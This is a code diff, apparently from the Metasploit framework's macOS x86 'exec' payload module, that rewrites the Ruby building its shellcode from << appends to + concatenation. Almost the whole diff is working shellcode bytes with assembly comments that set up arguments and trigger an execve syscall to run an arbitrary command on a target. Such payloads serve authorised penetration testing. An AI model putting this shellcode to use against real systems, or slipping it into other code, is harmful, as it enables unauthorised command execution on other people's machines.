Change to += syntax.

Author: jvennix-r7

modules/payloads/singles/osx/x86/exec.rb

@@ -31,7 +31,8 @@ def initialize(info = {})
 			                     'joev <jvennix[at]rapid7.com>' ],
 			'License'       => BSD_LICENSE,
 			'Platform'      => 'osx',
-			'Arch'          => ARCH_X86))
+			'Arch'          => ARCH_X86
+		))
 
 		# Register exec options
 		register_options(
@@ -53,38 +54,38 @@ def generate_stage
 		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
 
 		# Stuff an array of arg strings into memory
-		payload = ''
-		payload << "\x31\xc0"                         # XOR EAX, EAX  (eax => 0)
-		payload << Rex::Arch::X86.call(arg_str.length) # JMPs over CMD_STR, stores &CMD_STR on stack
-		payload << arg_str
-		payload << "\x5B"                             # POP EBX (EBX => &CMD)
+		payload =  "\x31\xc0" +                       # xor eax, eax  (eax => 0)
+		           Rex::Arch::X86.call(arg_str.length) + # jmp over CMD_STR, stores &CMD_STR on stack
+		           arg_str +
+		           "\x5B"                             # pop ebx (ebx => &CMD_STR)
 
 		# now EBX contains &cmd_parts[0], the exe path
 		if cmd_parts.length > 1
 			# Build an array of pointers to the arguments we copied on to the stack
-			payload << "\x89\xD9"                     # MOV ECX, EBX
-			payload << "\x50"                         # PUSH EAX; null byte (end of array)
-			payload << "\x89\xe2"                     # MOV EDX, ESP (EDX points to the end-of-array null byte)
+			payload += "\x89\xD9" +                   # mov ecx, ebx
+			           "\x50" +                       # push eax; null byte (end of array)
+			           "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
 			cmd_parts[1..-1].each_with_index do |arg, idx|
 				# can probably save space here by doing the loop in ASM
 				# for each arg, push its current memory location on to the stack
-				payload << "\x81\xC1"                 # ADD ECX, + ...
-				payload << [cmd_parts[idx].length+1].pack('V') # (cmd_parts[idx] is the prev arg)
-				payload << "\x51"                     # PUSH ECX (&cmd_parts[idx])
+				payload += "\x81\xC1" +               # add ecx, ...
+				           [cmd_parts[idx].length+1].pack('V') +
+				                                      # (cmd_parts[idx] is the prev arg)
+				           "\x51"                     # push ecx (&cmd_parts[idx])
 			end
-			payload << "\x53"                         # PUSH EBX (&cmd_parts[0])
-			payload << "\x89\xe1"                     # MOV ECX, ESP (ptr to ptr to first str)
-			payload << "\x52"                         # PUSH EDX
-			payload << "\x51"                         # PUSH ECX
+			payload += "\x53" +                       # push ebx (&cmd_parts[0])
+			           "\x89\xe1" +                   # mov ecx, esp (ptr to ptr to first str)
+			           "\x52" +                       # push edx
+			           "\x51"                         # push ecx
 		else
 			# pass NULL args array to execve() call
-			payload << "\x50\x50"                     # PUSH EAX, PUSH EAX
+			payload += "\x50\x50"                     # push eax, push eax
 		end
 
-		payload << "\x53"                             # PUSH EBX
-		payload << "\xb0\x3b"                         # MOV AL, 0x3B (execve)
-		payload << "\x50"                             # PUSH EAX
-		payload << "\xcd\x80"                         # INT 0x80 (triggers execve syscall)
+		payload += "\x53" +                           # push ebx
+		           "\xb0\x3b" +                       # mov al, 0x3b (execve)
+		           "\x50" +                           # push eax
+		           "\xcd\x80"                         # int 0x80 (triggers execve syscall)
 
 		payload
 	end